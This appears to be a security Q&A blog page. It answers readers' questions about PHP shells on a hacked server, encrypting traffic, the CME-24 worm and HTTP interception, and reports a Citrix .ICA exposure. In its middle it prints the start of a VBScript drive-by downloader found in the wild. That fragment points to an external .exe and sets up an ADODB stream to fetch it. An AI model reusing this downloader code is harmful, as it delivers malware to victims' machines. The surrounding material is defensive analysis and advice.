Q:

I have a webserver where i’ve found several different php shell scripts and I’d like to know how they got there.  Are there known vulnerabilities that allow uploading of php files to a server?

I have several sites running on this server with several php script packages including…

Zencart
phpbb2

Any ideas or pointers will be appreciated!

A: Hi,

There are several vulnerabilities in both off the shelf products as well as custom PHP scripts that would allow “uploading”, in essence they don’t need to upload, they just need to get your PHP scripts to execute an arbitrary (outside) PHP script.

PHPbb has several:
http://www.securiteam.com/cgi-bin/htsearch?sort=score&words=phpbb

Listed as Code Execution, Arbitrary File Upload, etc.

While zencart has just one problem:
http://www.securiteam.com/cgi-bin/htsearch?sort=score&words=zen+cart

But that could be misleading, and just mean that the software is very uncommon.

Mr. Petko D. ‘Acrobat-Gmail’ Petkov has reported about very interesting Citrix issue:

When querying for public .ICA files (Independent Computing Architecture) you can do serious things in the remote system with this information. Opening Cmd.exe and listing the file system works etc. etc.

Report here and YouTube video of 1:28min here.
Googledork and Yahoodork(!) included, it appears there are many .mil and .gov sites. And hospitals too.
A real life example: A Finnish high school in Jyväskylä town fixed its problem in less than 20 minutes after receiving my e-mail this morning. Fine!

One of our customers have brought this HTML based malware to our attention:

[title][/title]
[head][/head]
[body]
[script language="VBScript"]
on error resume next

‘ due to how ajax works, the file MUST be within the same local domain
dl = “http://grupo-arroba.by.ru/grupo.exe”

‘ create adodbstream object
Set df = document.createElement(“object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,”")
(more…)

Q:

We recently had two sites defaced on our servers, and the perpetrators are claiming to have used TCPDump. Is there a cheap way to encrypt the data packets to ensure they can’t be sniffed? … [snipped]

- Rob

A:

The easiest way to encrypt data between you and the server is to use SSL or SSH. If you are connecting to a web server, enable SSL encryption, if you are connecting to a service that can be protected by SSL, enable it.

If you can’t use SSL encryption in your product, you can use OpenSSH for tunneling of traffic to the destination host, or use OpenVPN (SSL based) to encrypt the connection between you and the destination host.

Q:

Hope you can help with this question.

If a computer is infected with CME 24 will it attempt to attack a mapped network drive?
Not just delivering its payload.

Thanks

A:

Hi,

Lets first try to understand what CME 24 is, CME – Common Malware Enumeration – is a relatively new standard in the way malwares are identified and sorted.

CME allows different vendors, such as: Aladdin Knowledge Systems, Authentium, Avira, CA, ClamAV, ESET, Fortinet, Grisoft, H+BEDV, iDefense, Kaspersky, McAfee, Microsoft, TrojanDownloader, Norman, Panda, Sophos, Symantec, and Trend Micro to name the malware they identify in such a way that the user can know that the Malware ‘X’ that company A has found is the same Malware named ‘Y’ that company B finds.

CME 24, which is also been named by the different vendors as,
Aladdin Knowledge Systems: Win32.Blackmal.e
Authentium: W32/Kapser.A@mm
AVIRA: Worm/KillAV.GR
CA: Win32/Blackmal.F
ESET: Win32/VB.NEI
Fortinet: W32/Grew.A!wm
F-Secure: Nyxem.E
Grisoft: Worm/Generic.FX
H+BEDV: Worm/KillAV.GR
Kaspersky: Email-Worm.Win32.Nyxem.e
McAfee: W32/MyWife.d@MM
Microsoft: Win32/Mywife.E@mm!CME-24
Norman: W32/Small.KI
Panda: W32/Tearec.A.worm
Sophos: W32/Nyxem-D
Symantec: W32.Blackmal.E@mm
TrendMicro: WORM_GREW.A

Destroy certain data files on an infected user’s machine on Friday, February 3, 2006.

According to our sources and independent analysis conducted on this worm, have revealed that the code should have destroyed. However, it is apparent that ITW (In the Wild) the worm’s payload does not function correctly making it unable to destroy content found on mapped drives.

Q:

Hello -

I’m assessing the vulnerability of a web service application, and have been trying to find out whether this sort of scenario is possible, and if so, what to do about it.

Is there any sort of malware that could be installed on a user’s PC, such that it would intercept non-browser based HTTP requests (consisting of data to be PUT), send this data to a site run by the malware authors, and then issue the PUT to the intended web site? The effect being that the data is sent to the correct web site, but a copy is also sent to another location, unbeknownst to the user.

If this is possible, would HTTPS circumvent this?

I’ve searched and searched but cannot find anything addressing this.

A:

Hi,

What you are describing sounds like a Proxy server. In essence, proxies receive requests made by the user, send them to their original destination, receive the response from the destination and redirect that response to the user.

The use of a PUT requests to implement this is the first time I have heard of it, however it is not something that would be impossible to do.

For Proxy servers – HTTPS might trigger a warning on the part of the proxy as the certificate of the web site being accessed would be different from that of the proxy server from which you are receiving the HTTPS traffic back.

For Malware – As no traffic is being sent to the real destination, HTTPS or HTTP would make no difference. In both cases your traffic is being modified and possibly manipulated. Mozilla/IE might detect this manipulation and might not, I cannot be certain.